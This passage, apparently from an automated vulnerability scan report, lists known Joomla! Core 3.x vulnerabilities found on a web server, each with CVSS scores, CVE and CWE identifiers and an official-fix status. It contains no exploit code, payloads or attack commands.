Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

30
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26033
CWE CWE-352
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Request Forgery (3.0.0 - 3.9.26)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26034
CWE CWE-352
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Request Forgery (3.2.0 - 3.9.12)

Classification

31
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-18650
CWE CWE-352
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.8.3)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

32
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-6380
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.11)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-16725
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.15)

Classification

33
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-10242
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

34
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-13761
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-13762
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.18)

Classification

35
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-11022
CVE CVE-2020-11023
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.19)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

36
Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-15696
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.25)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26030
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.26)

Classification

37
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26032
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.27)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

38
Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26039
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.0.0 - 3.9.27)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26035
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.1.0 - 3.9.23)

39
Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23125
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.1.2 - 3.8.7)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

40
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11328
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.2.0 - 3.9.3)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-9712
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Cross-Site Scripting (3.6.0 - 3.9.6)

Classification

41
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-12766
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Directory Traversal (3.0.0 - 3.9.24)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Base Score: 8.8

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: High

Integrity Impact: High

Availability Impact: High

42
Base Score: 6.0

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: Proof_of_concept

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-23132
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Directory Traversal (3.0.0 - 3.9.24)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26028
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Information Disclosure (3.0.0 - 3.8.7)

Classification

43
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11325
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Information Disclosure (3.0.0 - 3.9.19)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

44
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-15698
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Information Disclosure (3.1.0 - 3.8.7)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11327
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Information Disclosure (3.4.0 - 3.6.5)

Classification

45
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-8057
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Information Disclosure (3.6.0 - 3.9.12)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

46
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-18674
CWE CWE-200
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Local File Inclusion (3.0.0 - 3.9.25)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Base Score: 5.8

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: None

Availability Impact: None

Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: None

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2021-26031
CWE CWE-22
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.0.0 - 3.9.14)

Classification

47
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-8419
CVE CVE-2020-8420
CWE CWE-352
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Multiple Cross-Site Request Forgery Vulnerabilities (3.2.0 - 3.9.15)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

48
Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-10241
CWE CWE-352
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Multiple Cross-Site Scripting Vulnerabilities (3.0.0 - 3.8.7)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11326
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Multiple Cross-Site Scripting Vulnerabilities (3.0.0 - 3.9.3)

Classification

49
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-9711
CVE CVE-2019-9714
CWE CWE-79
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Multiple Vulnerabilities (3.2.0 - 3.6.5)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

50
Base Score: 5.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2017-7984
CVE CVE-2017-7987
CVE CVE-2017-7989
CWE CWE-79
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Open Redirect (3.0.0 - 3.9.20)

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

Base Score: 4.7

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: None

Base Score: 5.8

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-24598
CWE CWE-601
Affected items Variation

51
Web Server 1

Joomla! Core 3.x.x Prototype Pollution (3.0.0 - 3.9.4)

Classification
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N

Base Score: 4.1

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: Required

Scope: Changed

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 3.5

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2019-11358
CWE CWE-610
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Race Condition (3.0.0 - 3.8.7)

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L

Base Score: 5.0

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

CVSS3
User Interaction: Required

Scope: Unchanged

Confidentiality Impact: Low

Integrity Impact: Low

Availability Impact: Low

52
Base Score: 5.1

Access Vector: Network_accessible

Access Complexity: High

Authentication: None

Confidentiality Impact: Partial

Integrity Impact: Partial

Availability Impact: Partial

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2018-11324
CWE CWE-362
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.15)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Base Score: 5.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.3

Access Vector: Network_accessible

Access Complexity: Medium

Authentication: None

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-10240
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.19)

Classification

53
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Base Score: 4.3

Attack Vector: Network

Attack Complexity: Low

Privileges Required: Low

CVSS3
User Interaction: None

Scope: Unchanged

Confidentiality Impact: None

Integrity Impact: Low

Availability Impact: None

Base Score: 4.0

Access Vector: Network_accessible

Access Complexity: Low

Authentication: Single

Confidentiality Impact: None

Integrity Impact: Partial

Availability Impact: None

CVSS2 Exploitability: High

Remediation Level: Official_fix

Report Confidence: Confirmed

Availability Requirement: Not_defined

Collateral Damage Potential: Not_defined

Confidentiality Requirement: Not_defined

Integrity Requirement: Not_defined

Target Distribution: Not_defined

CVE CVE-2020-15697
CWE CWE-264
Affected items Variation
Web Server 1

Joomla! Core 3.x.x Security Bypass (3.0.0 - 3.9.23)

Classification
